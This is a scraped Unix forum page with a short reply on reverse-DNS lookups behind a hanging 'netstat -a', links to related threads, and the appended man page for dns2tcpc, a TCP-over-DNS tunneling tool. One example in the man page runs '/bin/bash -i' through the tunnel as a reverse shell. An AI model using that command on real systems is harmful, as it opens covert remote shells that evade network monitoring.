Sponsored Content
Full Discussion: netstat -a hang
Special Forums IP Networking netstat -a hang Post 302703897 by Corona688 on Thursday 20th of September 2012 01:51:43 PM
Old 09-20-2012
It'd just be a normal reverse-DNS lookup, asking a DNS server what domain name has that IP. Where it asks first depends on your configuration.

10 More Discussions You Might Find Interesting

1. IP Networking

Netstat

Giving netstat command on the prompt gives commands such as localhost.43592 localhost.35237 32768 0 32768 0 TIME_WAIT localhost.43594 localhost.43595 32768 0 32768 0 TIME_WAIT localhost.43598 localhost.35237 32768 0 32768 0 TIME_WAIT... (6 Replies)
Discussion started by: DPAI
6 Replies

2. Linux

Help for Linux hang up

Hi everybody, i need help regarding my Linux start up.I was trying to configure internet connection with my Red Hat in order to use for Internet,but of no avail and I think I have changed one parameter to activate device during computer start up. Now the problem is during start up and... (1 Reply)
Discussion started by: andysastre
1 Replies

3. SuSE

Hang a Process

this may be something trivial to many of you, but is there a way to purposely cause a process to hang? (6 Replies)
Discussion started by: laila63
6 Replies

4. Red Hat

system hang

Hello, I am having a HP proliant 350 G3 sever installed wih RedHat linux 9.0 when I enterd using any user(Except root) the server hanged after few seconds, also the folder icons are blacked out and the names of the folder icons are disapper. can any body help me. Ajay (1 Reply)
Discussion started by: ajay234
1 Replies

5. Shell Programming and Scripting

Ftp hang

Im making a script that goes out to about 200 servers and grabs log files daily and need to make sure the script gets all the servers it can even if one is out. I am ftp'ing the files over but if i cant connect to the server the process looks like it dies and the script is finished. (4 Replies)
Discussion started by: rcunn87
4 Replies

6. AIX

Boot from CD hang

Why is one of my blade hanging and does nothing after trying to boot from CD??? ================== I tried to press 1....JS20 does not support SMS menu Here's what I see after 30 minutes... ------------------------------------------------------------------------------- ... (0 Replies)
Discussion started by: mifch
0 Replies

7. Shell Programming and Scripting

Hang in linux

Hi guys sorry for my English I am from GREECE and I speak from translator.I have in my school work to hang the program I've done is this encounter the problems is that the meter that I have put on the mistakes does not work (I have not stated anywhere lathi = 0, not to reset the meter at each of... (1 Reply)
Discussion started by: soula
1 Replies

8. Solaris

netstat -- what am i looking at?

Greetings to all, Here is a line of output from my netstat command cbp031.904 wdcprodhome.nfsd 98304 0 49640 0 ESTABLISHED The only thing i recognize is the unix machine "cbp031" but what is .904 and all the other data telling me? Thanks in advance. (3 Replies)
Discussion started by: Harleyrci
3 Replies

9. UNIX for Advanced & Expert Users

Help with netstat

Hi, I want to list the time for how long a secure connections last to my server/blade. i am using netstat command to get the same, but not sure how to get the time for how long connections is being ESTABLISHED. netstat -na | grep 'ESTABLISHED' | grep :443 |awk '{print $4}' | cut -d: -f1 |... (1 Reply)
Discussion started by: Siddheshk
1 Replies

10. Solaris

ALOM hang

Hi guys, I'm new with solaris. I just received sunfire T2000 server. Problem: ALOM keep hang/stuck/jammed. Steps do before it hang : 1. Connect to T2000 (using RJ45 - DB9 cable) 2. Open putty, connect via serial. 3. Power on the server. 4. Its loading. 5. then, hang. ... (1 Reply)
Discussion started by: rajasraf
1 Replies
dns2tcpc(1)						      General Commands Manual						       dns2tcpc(1)

NAME
dns2tcpc - A tunneling tool that encapsulate TCP traffic over DNS. SYNOPSIS
dns2tcpc [ -h ] [ -c ] [ -z domain zone ] [ -d debug_level ] [ -r resource ] [ -k key ] [ -f config_file ] [ -e command ] [ -T request type ] [ -l local_port ] [ server ] DESCRIPTION
dns2tcpc is a network tool used to encapsulate TCP communications in DNS. When connections are received on a specific port all TCP traffic is sent to the remote dns2tcpd server and forwarded to a specific host and port. Multiple connections are supported. dns2tcpc was written for demonstration purposes. OPTIONS
-h Help Menu -c Enable DNS compression. When used, be sure that all relay and DNS server support compression and really use it. -z domain zone Use this domain as endpoint. -d debug level Change debug level. Levels available are 1, 2 or 3. -r resource Remote resource to access. -k key Pre shared key used for authentication (identification). -f config file Configuration file to use. -T request type Request type to use. Actually only KEY and TXT requests are supported. -e command Command to execute, I/O are redirected in the tunnel. -l local_port Local port accepting incomming connections (or - for stdin on UNIX systems). -t connection timeout Maximum DNS server's answer delay in seconds. A valid delay is between 1 and 240 seconds. Default is 3. server DNS server to use. The first entry in resolv.conf file will be choosen if the server is not specified. CONFIGURATION FILES
By default ${HOME}/.dns2tcprc is used if no configuration file is specified. Here is an example : domain = dns2tcp.hsc.fr resource = ssltunnel local_port = 4430 enable_compression = 0 debug_level = 1 key = mykey # DNS to use server = ns.hsc.fr EXAMPLES
dns2tcpc -k mykey -z dns2tcp.hsc.fr mydns Ask the dns2tcp server to list available resources. ssh -o 'ProxyCommand dns2tcpc -r ssh -l - -z dns2tcp.hsc.fr -k mykey mydns' myserver Use dns2tcp as a proxy command with ssh. We try to connect to the ssh resource with the key 'mykey' and the DNS mydns. dns2tcpc -r socat-resource -e '/bin/bash -i' -k mykey -z dns2tcp.hsc.fr mydns Use dns2tcp as a reverse shell, the remote shell will appear on the socat-resource. dns2tcpc -d 1 -f /dev/null -r ssl-tunnel -l 2000 -k mykey -T KEY -z dns2tcp.hsc.fr mydns Do not use the default configuration file, bind local port 2000 and forward all the traffic on the remote ssl-tunnel resource, use the first debug level. Use KEY type DNS requests. AUTHORS
Olivier Dembour <olivier.dembour@hsc.fr> SEE ALSO
ssltunnel dns2tcpc(1)